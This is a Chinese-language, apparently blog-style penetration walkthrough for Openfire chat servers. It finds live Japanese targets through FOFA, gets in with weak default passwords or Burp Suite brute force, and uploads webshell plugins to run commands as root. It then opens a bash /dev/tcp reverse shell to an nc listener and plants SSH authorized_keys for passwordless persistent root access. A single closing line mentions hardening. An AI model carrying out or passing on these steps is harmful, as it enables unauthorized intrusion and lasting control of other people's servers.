1.目标获取
(1
)fofa.so
网站使用搜索body="Openfire,
版本
: " && country=JP
,可以获取日本存在的
Openfire
服务器。如图
1
所示。
图1
搜索目标
2.暴力或者使用弱口令登录系统
一般弱口令admin/admin
、
admin/admin888
、
admin/123456
,如果不是这些请直接使用
burpsuite
进行暴力破解,能够正常访问的网站,如图
2
所示,
openfire
可能开放不同端口。
图2openfire
后台登陆地址
3.进入后台
输入密码正确后,如图3
所示,进入后台,可以查看服务器设置,查看用户
/
用户群,查看会话,分组聊天以及插件等信息。
图3
进入后台
4.查看并上传插件
单击插件,再其中可以看到所有的插件列表,在上传插件下单击上传插件,选择专门生成的openfire
带
webshell
的插件,如图
4
所示。
图4
上传插件
在本次测试中,从互联网收集了连个插件,如图5
所示,均成功上传。
图5
上传带
webshell
的插件
5.获取webshell
(1)helloworld插件获取webshell
单击服务器-
服务器设置,如图
6
所示,如果
helloworld
插件上传并运行成功,则会在配置文件下面生成一个用户接口设置。单击该链接即可获取
webshel
,如图
7
所示。
图6
查看服务器设置
图7
获取
webshell
(2)broadcast插件获取webshell
通过url+ plugins/broadcast/webshell
文件名称来和获取:
http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/cmd.jsp?cmd=whoami
http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/browser.jsp
在helloworld
插件中也可以通过地址来获取
http://xxx.xxx.xxx.xxx:8080/plugins/helloworld/chakan.jsp
如图8
,图
9
所示,分别获取broadcast
的webshell
以及查看当前用户权限为
root
。
图8
获取当前用户权限
图9
获取
webshell
6.免root密码登录服务器
渗透到这里按照过去的思路应该已经结束,不过笔者还想尝试另外一种思路,虽然我们通过webshell
可以获取
/etc/shadow
文件,但该
root
及其它用户的密码明显不是那么容易被破解的。服务器上面用
ssh
,能否利用公私钥来解决访问问题。
(1)反弹到肉鸡
执行一下命令,将该服务器反弹到肉鸡服务器xxx.xxx.xxx.xxx
的8080
端口,需要提前使用
nc
监听
8080
端口,也即执行“
nc -vv -l -p 8080
”如图
10
所示。
图10
监听
8080
端口
(2)反弹shell到肉鸡
执行命令“bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1”反弹到肉鸡,如图
11
所示,获取一个反弹
shell
。
图11
反弹
shell
7.实际操作流程
(1
)远程服务器生成公私钥
在被渗透的服务器上执行“ssh-keygen -t rsa”命令,默认三次回车,如图
12
所示,会在
root/.ssh/
目录下生成
id_rsa
及
id_rsa.pub
,其中
id_rsa
为服务器私钥,特别重要,
id_rsa.pub
为公钥。
图12
在远处服务器上生成公私钥
(2
)本地
linux
上生成公私钥
在本地linux
上执行命令 “ssh-keygen -t rsa”生成公私钥,将远程服务器的
id_rsa
下载到本地,执行命令“cat id_rsa > /root/.ssh/authorized_keys”命令,将远处服务器的私钥生成到authorized_keys文件。
(3
)将本地公钥上传到远程服务器上并生成authorized_keys
cat id_rsa.pub >/root/.ssh/authorized_keys
(4
)删除多余文件
rm id_rsa.pub
rm id_rsa
(5
)登录服务器
使用“ssh [email]root@1xx.1xx.111.1xx[/email]”登录服务器,不用输入远程服务器的密码,达到完美登录服务器的目的。效果如图
13
所示。
图13
成功登录对方服务器
8.总结
(1
)
Openfire
需要获取管理员帐号和密码,目前通杀所有帮本。
Openfire
最新版本为
4.1.5.
(2
)可以通过
burpsuite
进行
admin
管理员帐号的暴力破解。
(3
)使用
openfire
安全加固,可以使用强密码,同时严格设置插件权限,建议除了必须的插件目录外,禁用新创建目录。